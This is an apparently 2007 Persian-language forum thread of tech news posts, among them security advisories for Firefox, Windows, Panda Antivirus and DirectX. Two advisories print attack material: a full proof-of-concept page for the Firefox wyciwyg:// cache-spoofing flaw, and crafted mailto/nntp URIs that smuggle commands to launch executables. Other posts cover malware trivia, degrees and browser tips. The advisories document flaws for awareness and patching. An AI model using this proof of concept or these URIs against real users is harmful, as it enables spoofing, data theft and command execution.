ShirazOnline
صفحه 1 از 2 12 آخرینآخرین
نمایش نتایج: از شماره 1 تا 10 , از مجموع 13

موضوع: اخبار

  1. #1
    کاربر مستعد root آواتار ها
    تاریخ عضویت
    Dec 2006
    نوشته ها
    764
    تشکرها / پسندها

    Post اخبار

    دوستان لطفا اخبار ها رو در این تاپیک قرار دهید....

    با تشکر..


  2. # ADS
    Circuit advertisement
    تاریخ عضویت
    Always
    نوشته ها
    Many
     

  3. #2
    کاربر مستعد root آواتار ها
    تاریخ عضویت
    Dec 2006
    نوشته ها
    764
    تشکرها / پسندها

    Post دو آسیب پذیری مهم امنیتی در فایرفاکس

    محصولات
    Mozilla Firefox 2.0.x


    عنوان انگليسي : Firefox "wyciwyg://" Handler Vulnerability

    توضيحات كوتاه :

    آسیب پذیری در موزیلا فایرفاکس Mozilla Firefox می تواند توسط نفوذگران برای فراهم دیدن حملات جعل هویت و افشای اطلاعات حساس مورد استفاده قرار گیرد .
    آسیب پذیری در مدیریت URI handler بنام "wyciwyg://" می تواند باعث جعل محتوا از وب سایت های کش cached شده پیشین شود برای مثال از طریق HTTP 302 redirects هنگامی که کاربر سایت خاصی را مشاهده می کند ، شود .


    راه چاره :

    این آسیب پذیری برای نگارش 2.0.0.4 منتشر شده است و ویرایش های دیگر این سیستم نیز ممکن است دارای آسیب پذیری مشابه باشند.
    ساین های نامطمین را باز ننمایید .
    اعتبار كشف : Michal Zalewski

    اطلاعات تكميلي : [فقط اعضا می توانند لینک ها را مشاهده کنند برای ثبت نام اینجا را کلیک کنید]
    كد مخرب :Firefox "wyciwyg://" Handler Vulnerability

    کد:
    <html>        
    <head>
    <title>Firefox wyciwyg:// cache vulnerability demo</title>
    </head>
    <body style="width: 700px">
    <font face="arial" size="+0">
    <font size="+1" color="purple"><b>Firefox wyciwyg:// cache vulnerability demo</b></font>
    <hr size="1">
    <script>
    var nw;
    
    function hacksite() {
      nw = open('attack_bounce.cgi','_blank');
      setTimeout('invade()',1000);
    }
    
    function invade() {
      try {
        if (nw.document.location != 'http://beaverbank.dione.cc/') {
          alert("Something went wrong - my redirection trick didn't work.\n\n" +
                "It might be that you did not visit our fake bank first, or\n" +
                "perhaps your browser is not vulnerable.\n\n" +
                "If you suspect neither, try purging your browser cache and\n" +
                "restarting it to give us a clean start.");
        } else {
          nw.document.getElementById('ownme').innerHTML = 
            '<h1><font color=red>&hearts;&hearts;&hearts; BANK SITE DEFACED BY SECRET ADMIRERS &hearts;&hearts;&hearts;</font></h1><p>' +
            '<h3>The URL bar is showing <code>http://beaverbank.dione.cc/</code>, the site of our fake bank - but this page ' +
            'was<br>successfully accessed and populated with rogue content by an unrelated page hosted at <code>lcamtuf.coredump.cx</code>.';
          nw.setTimeout('alert("ATTACK SUCCESSFUL.\\n\\nWe managed to access data on the ' +
                        'targeted website, and\\ncan steal information or spoof content.");',200);
        }
      } catch (e) {
        alert('Your browser is probably not vulnerable - access violation.')
      }
    }
    
    </script>
    <p>
    Mozilla Firefox implements a unqiue, strictly internal <a href="http://en.wikipedia.org/wiki/WYCIWYG">wyciwyg://</a> 
    pseudo-URI scheme to sort and later reference locally cached pages that were generated or modified scriptually 
    on client side (a common practice for Web 2.0 sites).
    
    <p>
    Unfortunately, access control for wyciwyg:// URIs is largely inefficient. Although meant to be inaccessible
    to mere mortals, cached documents can be reached through <code>XMLHttpRequest</code> or 
    IFRAMEd <code>view-source:</code> (with proper same-domain policy implementation, but allowing rogue sites to store
    arbitrary markers on victim's computer, bypassing cookie settings); and, more disturbingly, through HTTP 302
    redirects, in which case, same-domain policy is not checked properly. The last option enables the attacker to:
    <ul>
    <li> Steal sensitive information previously displayed on susceptible sites,</li>
    <li> Perform browser cache poisoning by injecting own content into existing documents,</li>
    <li> Perform old-schooled URL bar spoofing, but <u>complete with SSL state data</u></li>
    
    </ul>
    <p>
    Uncool. I provided a quick demonstration of that last option against a fictious bank of mine, hosted
    at a distinct domain (<code>beaverbank.dione.cc</code>). To test your browser, follow these steps:
    <p>
    <ol>
    <li>Go to <a href="http://beaverbank.dione.cc/" target="_blank">Beaver Creek Bank</a> and click on the login button,</li>
    <li>Close <i>Beaver Bank</i> window - feel free to kill some time if desired,</li>
    
    <li>Click on the button below to intercept previously edited page and replace its contents.</li>
    </ol>
    <p>
    <input type=submit value="Attempt interception" onclick="hacksite()">
    <p>
    Should beaverbank.dione.cc be a SSL site with a valid certificate, our spoofed page would also
    appear to have a valid cert - which puts the attack a notch above your typical URL bar spoofing 
    scenario. Also, as indicated above, should any of the dynamically geenrated or modified pages
    contain sensitive information, we could divert that data elsewhere (there are several large 
    webmail providers who would be vulnerable).
    <p>
    Questions and comments: <a href="mailto:lcamtuf@coredump.cx">Michal Zalewski &lt;lcamtuf@coredump.cx&gt;</a>.
    منابع : [فقط اعضا می توانند لینک ها را مشاهده کنند برای ثبت نام اینجا را کلیک کنید]
    ویرایش توسط root : 2007/07/16 در ساعت 09:39 PM


  4. #3
    کاربر مستعد root آواتار ها
    تاریخ عضویت
    Dec 2006
    نوشته ها
    764
    تشکرها / پسندها

    Post فهرست عجيب‌ترين ويروس‌هاي رايانه‌اي در نيمه نخست سال 2007

    فاوانيوز: به عقيده كارشناسان امنيتي، سال 2007، شروعي تازه براي خرابكاران اينترنتي و هكرها بوده است تا علاوه بر افزايش تنوع عملكردهاي غيرقانوني، ‌روش‌هاي تخريبي عجيب و نامتعارفي را نيز بر حسب خلاقيت شخصي خود ابداع كرده و مورد استفاده قرار دهند.
    به گزارش فاوانيوز، آزمايشگاه‌هاي امنيتي شركت پاندا گزارش داده‌اند كه اين مساله باعث شده است تا روش‌هاي نفوذ و تخريب بدافزارهاي رايانه‌اي نيز، به مراتب متنوع‌تر، متفاوت‌تر و نامتعارف‌تر از گذشته باشد.
    اين بدافزارها به دلايل مختلفي چون، مضحكه كاربران و نرم‌افزارهاي امنيتي، خودنمايي و كسب اعتبار، رقابت، افزايش خسارت و يا حتي نمايش اعتقادات و باورهاي خرابكاران، بسيار عجيب و در عين حال جالب توجه هستند.
    براساس گزارش پاندا، فهرستي از اين ويروس هاي عجيب و غريب كه در نيمه نخست سال 2007 ميلادي توسط PandaLabs، كشف و رديابي شدند، منتشر شد.


    USBToy.A،‌ ويروس موعظه‌گر
    اين كرم رايانه‌اي با نفوذ به سيستم‌ها و در كنار فعاليت‌هاي تخريبي خود به تبليغ ديني و ارشاد مذهبي كاربران مي‌پردازد. به عنوان مثال اين بدافزار، در هنگام راه‌اندازي سيستم عامل، آيه‌هايي از انجيل را براي كاربر نمايش داده و براي مردم جهان، رستگاري الهي آرزو مي‌كند.


    Burglar.A، ويروسي كه زياد مي‌دانست
    اين تروژان علاوه بر سرقت رمزهاي عبور و اطلاعات محرمانه ديگر، مشخصات دقيق جغرافيايي، اطلاعاتي و رايانه‌اي كاربران مورد حمله خود را به آنها اطلاع داده و به منتشر كننده خود ارسال مي‌كند.


    ArmyMovement، با آرزوهاي بزرگ
    اين كد مخرب كه به طور خاص در كشور تركيه بسيار مشهور شد، با ارسال پي درپي پيغام‌هاي غيرواقعي به كاربران (البته به زبان تركي)، ادعا مي‌كرد كه دستمزد كاركنان كشوري و لشگري دولت در آينده‌اي نزديك تا سقف 50 درصد افزايش خواهد يافت.


    Rinbot.B، يك ژورناليست تمام عيار
    انتشار اين كرم اينترنتي، بازتاب گسترده‌اي در رسانه‌هاي جهان داشت، زيرا علاوه بر تخريب وسيع سيستم‌ها، با نمايش يك مصاحبه تخيلي (اما كاملا حرفه‌اي) با خبرگزاري CNN، از دلايل و انگيزه‌هاي خالق و منتشر كننده خود، خبر مي‌داد.


    XPCSpy، سارق چيره دست
    هيچ نوع فايل، داده و يا اطلاعات مهم و حساس، از چشمان تيز بين اين تروژان خطرناك در امان نخواهد بود. عبارت‌هاي تايپ شده در صفحات وب، اطلاعات مربوط به پنجره‌هاي باز شده، برنامه‌هاي اجرا شده، وب‌سايت‌هاي مرور شده و يا حتي نامه‌هاي الكترونيك خوانده شده توسط كاربر، تنها بخشي از مواردي است كه اين كد خطرناك قادر به سرقت آنها است.


    Ketawa.A، ويروس شوخ طبع
    اين ويروس،‌ براي نخستين بار در كشورهاي جنوب شرق آسيا كشف شد، كه يه جاي اجراي عملكردهاي تخريبي و ايجاد اختلال در فعاليت سيستم، با استفاده از زبان مالايايي به ارسال لطيفه‌هاي پي در پي براي كاربر و تشويق وي به خنديدن مي‌پردازد.
    البته ارسال پي درپي و بي موقع اين لطيفه‌ها، پس از مدت كوتاهي، كاربر مورد حمله اين بدافزار را از كوره به در خواهد برد.

    Gronev.A، رفتار مهربان و خشونت پنهان
    اين ويروس خطرناك كه اغلب جستجوگران موسيقي در اينترنت را مورد حمله خود قرار مي‌دهد، با نفوذ و آغاز فعاليت خود در سيستم، برنامه Media Player را بطور خودكار اجرا كرده و شروع به نواختن يك سمفوني زيبا و مشهور با عنوان Lagu، مي‌كند درحالي‌كه كاربر نگون‌بخت به قطعه دلنواز و در حال پخش، گوش مي‌دهد، رايانه وي نيز به تدريج با تخريب و اختلال شديدي مواجه مي‌شود.


    Harreinx.A و Pirabbian.A، آكتورهاي بزرگ سينما
    سينما هميشه علاقه‌مندان حرفه‌اي و پروپاقرص خود را داشته است. طراحان و منتشركنندگان اين دو كد مخرب با هدف قراردادن دوستداران اين هنر و ادعاي نمايش و دانلود رايگان فيلم‌هاي پرفروش و پرطرفدار، كاربران را به كليك بر روي لينك هاي آلوده تحريك مي‌كنند.


    BotVoice.A، وراج و جسور
    تنها آرزو كنيد كه اولا رايانه شما هيچ وقت توسط اين ويروس بي‌حم آلوده نشود، دوم اين كه اميدوار باشيد حداقل در هنگام ورود ناگهاني اين كد به رايانه‌تان، بلندگوهاي سيستم خاموش باشند.
    در غير اين صورت، BotVoice.A به محض شروع فعاليت، حضور خود را با صدايي بلند به كاربر مورد حمله اعلام كرده و تا وقتي كه تمامي فايل‌ها و داده هاي مهم سيستم را پاك كرده و يا آن را با اختلال جدي مواجه كند، جملات خود را به صورت پي در پي تكرار مي‌كند.
    ابزار رايگان كشف و پاكسازي كدهاي مخرب فوق و نيز ساير بدافزارهاي رايانه‌اي، براي تمامي كاربران اينترنت در آدرس [فقط اعضا می توانند لینک ها را مشاهده کنند برای ثبت نام اینجا را کلیک کنید] قابل دسترسي است.



  5. #4
    کاربر مستعد root آواتار ها
    تاریخ عضویت
    Dec 2006
    نوشته ها
    764
    تشکرها / پسندها

    اینترنت بازا جم کنن برن خونشون.........:))


    سرویس اخبار خارجی ایتنا - یک پیرزن 75 ساله سوئدی موفق شد با سرعت 40 گیگابایت بر ثانیه رکورد سریع‌ترین جست‌وجوی اینترنتی را بشکند.

    آیا تاکنون فکر کرده‌اید که چه کسی توانسته است از بالاترین سرعت اتصال به اینترنت استفاده کند؟

    حتما پاسخ بی‌تردید پاسخ می‌دهید: «بیل گیتس و همکارانش در خانه غول نرم‌افزاری دنیا.»
    اما پاسخ شما کاملا اشتباه است، زیرا یک زن 75 ساله به کمک پسرش افتخار استفاده از پرسرعت‌ترین اینترنت را داشته است.

    «سیگبریت لاثبرگ» 75 ساله اهل "کارلستاد" سوئد توانست تنها با استفاده از یک رایانه شخصی خانگی با سرعت 40 گیگابایت برثانیه بیش از هزارو 500 کانال تلویزیون را از اینترنت روی DVD بارگذاری کند.

    به نوشته روزنامه سوئدی Local، «پیتر لاثبرگ» پسر این زن سالمند براساس توافقی که با شرکت سیسکو با هدف نشان دادن پتانسیل‌های خاص فیبرهای دیداری انجام داده بود، این سرعت بالا را برای استفاده مادرش گرفته است.

    به این ترتیب این زن توانست نام خود را به عنوان تنها فرد 75 ساله تکنولوژیکی دنیا در تاریخ انفورماتیک به ثبت برساند.



    اون وقت ما میشینیم تو خونمون هلک هلک با dialup اینترنت کار میکنیم و به یه فایل 1مگی که میرسیم کی بردو گاز میگیریم و در به در یه adsl 128 در هر قصابی هم می ریم:d
    ویرایش توسط root : 2007/07/26 در ساعت 04:29 AM


  6. #5
    کاربر مستعد root آواتار ها
    تاریخ عضویت
    Dec 2006
    نوشته ها
    764
    تشکرها / پسندها

    Post «ژانوس» کوچك‌ترین و سریع‌ترین ابررایانه دنیا




    سرویس اخبار خارجی ایتنا - برای انجام این تعداد عملیاتی که اين ابررايانه تنها در مدت یک ثانیه انجام می‌دهد به کارسه میلیارد نفر درمدت 60 روز نیازاست.


    گروهی از محققان ایتالیایی و اسپانیایی در حال ساخت کوچک‌ترین، سریع‌ترین و کم مصرف‌ترین ابررایانه دنیا هستند.

    دانشمندان موسسه یوروتک ایتالیا با همکاری موسسه رایانه‌های زیستی و سیستم‌های محاسباتی زاراگوزا در اسپانیا مراحل اولیه ساخت این ابر رایانه را با هزینه‌ای درحدود یک میلیون یورو آغاز کرده‌اند.

    این ابررایانه کوچک که «ژانوس» نام دارد، می تواند 8 میلیون میلیارد عملیات را در ثانیه تنها با مصرف انرژی 10 کیلو وات انجام دهد.

    این درحالی است که یک سیستم رایانه‌ای متشکل از دو هزار پردازشگر 300 کیلووات انرژی مصرف می‌کند.

    ابعاد ژانوس که مهارت خاصی در شبیه‌سازی علوم کاربردی در عرصه فناوری نانو دارد، تنها یک متر عرض، یک مترعمق و دو متر ارتفاع است.

    جالب است بدانید، برای انجام این تعداد عملیاتی که ژانوس تنها در مدت یک ثانیه انجام می‌دهد به کارسه میلیارد نفر درمدت 60 روز نیاز است.



  7. #6
    کاربر مستعد root آواتار ها
    تاریخ عضویت
    Dec 2006
    نوشته ها
    764
    تشکرها / پسندها

    Post آسیب اجرای فرمان در مدیریت Url ها در ویندوز

    برنامه آسيب پذير :

    محصولات
    مایکروسافت ویندوز ایکس پی ویرایش خانگی (Microsoft Windows XP Home Edition)
    مایکروسافت ویندوز ایکس پی ویرایش حرفه ای (Microsoft Windows XP Professional)
    مایکروسافت ویندوز 2003 ویرایش استاندارد (Microsoft Windows Server 2003 Standard Edition)
    مایکروسافت ویندوز 2003 ویرایش اقتصادی (Microsoft Windows Server 2003 Enterprise Edition)
    مایکروسافت ویندوز 2003 ویرایش دیتاسنتر (Microsoft Windows Server 2003 Datacenter Edition)
    مایکروسافت ویندوز 2003 ویرایش وب (Microsoft Windows Server 2003 Web Edition)
    Microsoft Internet Explorer 7.x


    عنوان انگليسي : Microsoft Windows URI Handling Command Execution Vulnerability

    توضيحات كوتاه :

    یک باگ در مایکروسافت وینذوز کشف و گزارش شده است که امکان دسترسی غیرمجاز به سیستم های آسیب پذیر را برای افراد فراهم مینماید.
    آسیب ناشی از عدم بررسی صحیح ورودی در مدیریت URIهای پیش فرض سیستم در URIهای ثبت شده میباشد ( مانند mailto, news, nntp, snews, telnet)
    این آسیب امکان اجرای کدهای دلخواه را به افراد میدهد.بطور مثال در زمان بازدید یک کاربر با استفاده از مرورگر firefox از وب سایت دارای یک URI خاص mailto که دارای کاراکتر % بوده و به پسوند فایلهایی مانند .bat یا .com منتهی شود.

    بطور مثال:
    mailto:test%../../../../windows/system32/calc.exe".cmd
    nntp:../../../../../Windows/system32/telnet.exe" "bugtraq.ir 80%.bat
    telnet:// rundll32.exe url.dll,TelnetProtocolHandler %l

    news:// “%ProgramFiles%\Outlook Express\msimn.exe” /newsurl:%1

    nntp:// “%ProgramFiles%\Outlook Express\msimn.exe” /newsurl:%1

    snews:// “%ProgramFiles%\Outlook Express\msimn.exe” /newsurl:%1

    mailto:// C:\lotus\notes\notes.exe /defini %1
    استفاده کامل از این آسیب پذیری نیازمند نصب بودن اینترنت اکسپل.رر نسخه 7 در سیستم قربانی را دارد.

    آسیب برای ویندوز XP سرویس پک 2 بهمراه تمام بسته های امنیتی و ویندوز 2003 سرویس پک 2 بهمراه تمام تمام بسته های امنیتی ، با استفاده از Firefox نسخه 2.0.0.5 و Netscape Navigator نسخه 9.b2 تایید شده است ، دیگر نسخه ها نیز ممکن است دارای آسیب مشابه باشند.


    راه چاره :

    از بارنمودن لینکهای مشکوک خودداری نمایید. اعتبار كشف : Billy (BK) Rios

    اطلاعات تكميلي :
    [فقط اعضا می توانند لینک ها را مشاهده کنند برای ثبت نام اینجا را کلیک کنید]
    [فقط اعضا می توانند لینک ها را مشاهده کنند برای ثبت نام اینجا را کلیک کنید]
    [فقط اعضا می توانند لینک ها را مشاهده کنند برای ثبت نام اینجا را کلیک کنید]


    منابع :

    [فقط اعضا می توانند لینک ها را مشاهده کنند برای ثبت نام اینجا را کلیک کنید]


  8. #7
    کاربر مستعد root آواتار ها
    تاریخ عضویت
    Dec 2006
    نوشته ها
    764
    تشکرها / پسندها

    پیش فرض آسیب پذیری آنتی ویروس پاندا - Panda Antivirus

    محصولات
    Panda AntiVirus Titanium
    Panda AntiVirus Platinum 7.x
    Panda AntiVirus Small Business Edition
    Panda AntiVirus Enterprise Suite
    Panda AntiVirus Platinum 6.x



    عنوان انگليسي :
    Panda Antivirus EXE File Parsing Buffer Overflow Vulnerability

    توضيحات كوتاه :

    یک حفره امنیتی در پاندا آنتی ویروس Panda Antivirus گزارش شده است . چنین آسیب پذیری میتوانند خطر بالقوه ای برای سیستمهای کاربران باشد.
    آسیب پذیری از یک خطای حدی (Boundary Error) در زمان پردازش و تجزیه فایل های .EXE ناشی می شود.
    این موضوع میتوانند باعث یک سرریز بافر ( Buffer Overflow ) بهنگام پویش فایل های دستکاری شده .EXE شود .

    موفقیت در اجرا حمله به نفوذگر امکان اجرای کدهای دلخواه را میدهد.

    راه چاره :

    بروزرسان با مکانیزم معمولی به 2007-07-20 می تواند مشکل را حل نماید .
    اعتبار كشف : Sergio Alvarez

    اطلاعات تكميلي :
    [فقط اعضا می توانند لینک ها را مشاهده کنند برای ثبت نام اینجا را کلیک کنید]


    منابع :

    [فقط اعضا می توانند لینک ها را مشاهده کنند برای ثبت نام اینجا را کلیک کنید]


  9. #8
    کاربر مستعد root آواتار ها
    تاریخ عضویت
    Dec 2006
    نوشته ها
    764
    تشکرها / پسندها

    پیش فرض آسیب پذیری سرریزی بافر در Microsoft DirectX

    محصولات
    [فقط اعضا می توانند لینک ها را مشاهده کنند برای ثبت نام اینجا را کلیک کنید]
    [فقط اعضا می توانند لینک ها را مشاهده کنند برای ثبت نام اینجا را کلیک کنید]
    [فقط اعضا می توانند لینک ها را مشاهده کنند برای ثبت نام اینجا را کلیک کنید]
    [فقط اعضا می توانند لینک ها را مشاهده کنند برای ثبت نام اینجا را کلیک کنید]







    عنوان انگليسي : Microsoft DirectX RLE Compressed Targa Image Processing Buffer Overflow

    توضيحات كوتاه :

    آسیب پذیری ای در Microsoft DirectX گزارش شده است که میتواند مورد سوء استفاده افراد جهت دسترسی به سیستم های آسیب پذیر گردد.
    این آسیب پذیری بر اثر بروز یک خطای تایید صحت ورودی در هنگام پردازش RLE تصاویر فشرده Targa بوجود می آید. این مشکل میتواند مورد سوء استفاده افراد جهت ایجاد یک حمله سر ریزی بافر بر مبنای Heap از طریق تصاویر Targa دستکاری شده گردد.
    حمله موفقیت آمیز اجازه اجرای فرامین دلخواه را به نفوذگر میدهد.
    این آسیب پذیری برای Microsoft's DirectX SDK و End-User Runtime پیش از تاریخ فوریه 2006 گزارش شده است. ویرایش های دیگر ممکن است دارای آسیب پذیری مشابه باشند.

    راه چاره :

    به روز رسانی به نسخه SDK و End-User Runtime منتشر شده در تاریخ فوریه 2006 و یا نسخه های پس از آن. اعتبار كشف : Ruben Santamarta, Reverse Mode

    اطلاعات تكميلي :
    [فقط اعضا می توانند لینک ها را مشاهده کنند برای ثبت نام اینجا را کلیک کنید]
    [فقط اعضا می توانند لینک ها را مشاهده کنند برای ثبت نام اینجا را کلیک کنید]


    منابع :

    [فقط اعضا می توانند لینک ها را مشاهده کنند برای ثبت نام اینجا را کلیک کنید]



  10. #9
    کاربر مستعد root آواتار ها
    تاریخ عضویت
    Dec 2006
    نوشته ها
    764
    تشکرها / پسندها

    Post درباره مدارک دانشگاهی بیشتر بدانیم

    همه ما در باره مدارک دانشگاهی رایج در ایران به اندازه کافی می دانیم: فوق دیپلم، لیسانس، فوق لیسانس، دکترا و سرانجام فوق دکترا. این مدارج را می توان پله پله طی کرد (ناپیوسته) و یا به طور پیوسته (البته تا دکترای حرفه ای). اما آیا تا کنون به یافتن معادل انگلیسی آنها نیاز پیدا کرده اید؟ کاری که تا حدی مساله دار به نظر می رسد. در این نوشته سعی کرده ام مدارج دانشگاهی معتبر دنیا را به شما معرفی کنم. اگر علاقمندید، با من باشید.

    در ایالات متحده
    در آمریکا، درجات اصلی دانشگاهی، عبارتند از:
    الف) لیسانس(Bachelor's Degree) که معولا 4 سال است و خود به دو دسته تقسیم می شود:
    Bachelor of Art یا (.B.A): که همان لیسانس خودمان است در رشته های علوم انسانی مثلا علوم طبیعی، علوم اجتماعی و زبانهای خارجی
    Bachelor of Science یا (.B.S یا .B.Sc): که همان لیسانس خودمان است در رشته های تجربی و مهندسی.
    ب) فوق لیسانس (Master's Degree) که معولا دو تا سه سال است و باز هم به دو دسته تقسیم می شود:
    Master of Art یا (.M.A): که همان فوق لیسانس خودمان است در رشته های علوم انسانی مثلا علوم طبیعی، علوم اجتماعی و زبانهای خارجی
    Master of Science یا (.M.S یا .M.Sc): که همان فوق لیسانس خودمان است در رشته های تجربی و مهندسی.
    ج)دکترا (معمولا.Ph.D) که حدودا یکسال یا بیشتر به طول می انجامد و فرد علاوه بر تحصیل باید به تدریس و انجام پایان نامه نیز مبادرت ورزد.
    همچنین در بعضی از رشته ها که کار عملی در آنها ضرورت دارد (مانند حقوق، پزشکی، دندانپزشکی، داروسازی و... ) نوع دیگری از درجات علمی به نام First Professional Degree وجود دارد که خود در دو رده Graduate و Undergraduate (قبل از لیسانس یا بعد از لیسانس) اهدا می شود. در صورتی که فرد در رده Graduate موفق به اخذ First Professional Degree شود به آن دکترای حرفه ای (Professional Doctorate) می گویند. این نوع مدرک معمولا در آمریکا رایج است ( و البته در ایران). در بیشتر کشورهای جهان برای دکترای حرفه ای معادل لیسانس یا فوق لیسانس آن را به فرد اهدا می کنند( در این کشورها، واژه دکتر به معنی کسی است که در اثر تحقیق و پژوهش و با طی دوره های ویژه به آن نایل گشته است).
    در انگلستان
    در انگلیس و کشورهایی که از سیستم انگلیسی در دانشگاه هایشان پیروی می کنند(مثل کانادا، ایرلند، هند، سنگاپور و هنگ کنگ) دو نوع لیسانس برای هر کدام از.B.A یا .B.S وجود دارد: نوع اول که نوع معمولی آن است و به آن Pass Degree می گویند و معمولا سه سال طول می کشد و نوع دوم که نیازمند نمرات بالاتر در طول تحصیل و گاها طی دوره طولانی تری است که به آن Honours Degree می گویند. اگر فردی لیسانس از نوع دوم داشته باشد کلمه Hons را بعد از عنوان مدرکش داخل پرانتز می نویسند. مانند (B.A. (Hons
    برای مدارج بالاتر (Postgraduate) مانند M.A مدرک Honours وجود ندارد چون معمولا در این رده ها ارزیابی به وسیله امتحان انجام نمی شود.
    همچنین در اینجا هم مدرک دکترای حرفه ای وجود دارد مثلا برای پزشکان (.M.D) و برای متخصصان دندانپزشکی (DDS).
    در پایان ذکر این نکته را ضروری می دانم: این نوشته تنها چکیده مختصری از انواع مدارج و مدارک علمی موجود در دنیاست که من با کمک دانشنامه [فقط اعضا می توانند لینک ها را مشاهده کنند برای ثبت نام اینجا را کلیک کنید] جمع آوری کرده ام. اگر دوستان اطلاعات و یا تجربه بیشتری در این زمینه دارند خواهشمندم نظر خود را به صورت کامنت در زیر مطلب درج کنند تا دیگران هم از آن استفاده لازم راببرند.






    link:[فقط اعضا می توانند لینک ها را مشاهده کنند برای ثبت نام اینجا را کلیک کنید]



  11. #10
    کاربر مستعد root آواتار ها
    تاریخ عضویت
    Dec 2006
    نوشته ها
    764
    تشکرها / پسندها

    Post فایرفاکس خود را ایرانیزه کنید

    امروز مطلبی جالبی دیدم در مورد تغییر قابلیت auto-completes در فایرفاکس. یکی از بهترین کلیدهای میانبری که برای مرورگرها ساخته شده کلید های Ctrl + Enter هست که در آدرس بار عبارت www. را به اول و .com را به آخر آدرس اضافه می کند.
    فایرفاکس مانور بهتری روی این کلید ها داده بطوری که با زدن کلید های Shift + Enter علاوه بر www اول عبارت .net را به آخر اضافه می کنه و به همین ترتیب کلید های Ctrl + Shift + Enter عبارت .org را به آخر آدرس اضافه می کند.
    چند وقت پیش دنبال این بودم که بتونم کلید میانبری تعریف کنم که در آخر آدرس عبارت .ir اضافه بشه ولی چیز زیادی دستگیرم نشد تا اینکه امروز فهمیدم اکستنشی هست برای این کار و ویرایش این قسمت.
    شما می تونید این اکستنشن رو[فقط اعضا می توانند لینک ها را مشاهده کنند برای ثبت نام اینجا را کلیک کنید] دانلود و نصب کنید. کار باهاش بسیار راحت هست، کافیست به قسمت تنظیمات افزونه بروید ( [فقط اعضا می توانند لینک ها را مشاهده کنند برای ثبت نام اینجا را کلیک کنید] ).
    منبع: [فقط اعضا می توانند لینک ها را مشاهده کنند برای ثبت نام اینجا را کلیک کنید]



صفحه 1 از 2 12 آخرینآخرین

اطلاعات موضوع

کاربرانی که در حال مشاهده این موضوع هستند

در حال حاضر 1 کاربر در حال مشاهده این موضوع است. (0 کاربران و 1 مهمان ها)

علاقه مندی ها (Bookmarks)

علاقه مندی ها (Bookmarks)

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید.
  • شما نمیتوانید پست های خود را ویرایش کنید
  •